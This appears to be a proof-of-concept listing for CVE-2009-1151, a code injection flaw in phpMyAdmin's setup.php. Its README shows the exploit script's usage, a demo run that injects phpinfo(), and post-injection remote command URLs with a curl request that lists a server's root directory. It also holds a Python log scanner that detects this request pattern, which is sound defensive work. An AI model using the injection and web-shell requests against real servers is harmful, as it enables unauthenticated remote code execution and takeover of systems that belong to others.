CVE-2009-1151 PoC — phpMyAdmin setup.php Script PHP Code Injection Vulnerability

Source
Associated Vulnerability
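Title: phpMyAdmin setup.php Script PHP Code Injection Vulnerability (CVE-2009-1151)
Description: phpMyAdmin is a tool written in PHP for administering MySQL over the web. phpMyAdmin's Setup script is used to generate the configuration. If a remote attacker submits a specially crafted POST request to this script, arbitrary PHP code may be included in the generated config.inc.php configuration file. Because the configuration file is saved on the server, an unauthenticated remote attacker can exploit this vulnerability to execute arbitrary PHP code.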
Description
phpMyAdmin '/scripts/setup.php' PHP Code Injection RCE PoC (CVE-2009-1151)
Readme
# minervais.com.phpMyAdminRCE.sh
phpMyAdmin '/scripts/setup.php' PHP Code Injection RCE POC. This was the first publicly-released exploit for CVE-2009-1151.

## Syntax
```
$ ./phpMyAdminRCE.sh
usage: ./phpMyAdminRCE.sh <phpMyAdmin_base_URL>
i.e.: ./phpMyAdminRCE.sh http://target.tld/phpMyAdmin/
```

## Demo
```
$ ./phpMyAdminRCE.sh http://172.16.211.10/phpMyAdmin-3.0.1.1/
[+] checking if phpMyAdmin exists on URL provided ...
[+] phpMyAdmin cookie and form token received successfully. Good!
[+] attempting to inject phpinfo() ...
[+] success! phpinfo() injected successfully! output saved on /tmp/phpMyAdminRCE.sh.9217.phpinfo.flag.html
[+] you *should* now be able to remotely run shell commands and PHP code using your browser. i.e.:
    http://172.16.211.10/phpMyAdmin-3.0.1.1//config/config.inc.php?c=ls+-l+/
    http://172.16.211.10/phpMyAdmin-3.0.1.1//config/config.inc.php?p=phpinfo();
    please send any feedback/improvements for this script to unknown.pentester<AT_sign_goes_here>gmail.com
```

## Post-injection RCE:
```
$ curl "http://172.16.211.10/phpMyAdmin-3.0.1.1//config/config.inc.php?c=ls+-l+/"
total 96
drwxr-xr-x   2 root   root  4096 Mar 11 10:12 bin
drwxr-xr-x   3 root   root  4096 May  6 10:01 boot
lrwxrwxrwx   1 root   root    11 Oct 12  2008 cdrom -> media/cdrom
drwxr-xr-x  15 root   root 14300 Jun  5 09:02 dev
drwxr-xr-x 147 root   root 12288 Jun  5 09:02 etc
drwxr-xr-x   3 root   root  4096 Oct 18  2008 home
drwxr-xr-x   2 root   root  4096 Jul  2  2008 initrd
_[partial output removed for brevity reasons]_
```
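
A log check for the request pattern shown in the demo above, as an added example that is not part of the original README or exploit script: it flags POSTs to `scripts/setup.php` and parameterised requests to `config/config.inc.php` in a web server access log. The combined log format, the sample lines and the severity labels are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumed input: common/combined log format
#   ip - - [time] "METHOD target PROTO" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')

# Constructed sample lines (documentation addresses, not real traffic).
SAMPLE_LOG = """\
198.51.100.7 - - [05/Jun/2009:09:10:01 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 200 9120
198.51.100.7 - - [05/Jun/2009:09:10:02 +0000] "POST /phpMyAdmin/scripts/setup.php HTTP/1.1" 200 8734
198.51.100.7 - - [05/Jun/2009:09:10:05 +0000] "GET /phpMyAdmin//config/config.inc.php?c=ls+-l+/ HTTP/1.1" 200 512
203.0.113.20 - - [05/Jun/2009:09:11:00 +0000] "GET /phpMyAdmin/index.php HTTP/1.1" 200 4100
203.0.113.21 - - [05/Jun/2009:09:12:00 +0000] "GET /pma/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 210
"""

def scan(log_text):
    """Return a list of (client_ip, severity, reason) findings, in log order."""
    findings, posted_setup = [], set()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, _ts, method, target, status = m.groups()
        url = urlsplit(target)
        # Collapse repeated slashes: the README's URLs contain '//config/'.
        path = re.sub(r"/{2,}", "/", url.path).lower()
        if method == "POST" and path.endswith("/scripts/setup.php"):
            posted_setup.add(ip)
            findings.append((ip, "medium", "POST to scripts/setup.php"))
        elif path.endswith("/config/config.inc.php") and url.query:
            params = sorted(parse_qs(url.query, keep_blank_values=True))
            # A config file has no reason to receive parameters; a 200 after a
            # setup.php POST from the same client matches the README's sequence.
            high = ip in posted_setup and status == "200"
            findings.append((ip, "high" if high else "medium",
                             "config.inc.php requested with params " + ",".join(params)))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding, sep="\t")
```

Correlation here is by client address only, so requests relayed through different proxies will appear as separate medium findings rather than one high finding.
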
File Snapshot

```
[4.0K] /data/pocs/1169b7e2a1cfd6dfa6ca8256813f0a49c74bf9c7
├── [ 34K] calc.xls
├── [4.2K] minervais.com.phpMyAdminRCE.sh
└── [1.5K] README.md

0 directories, 3 files
```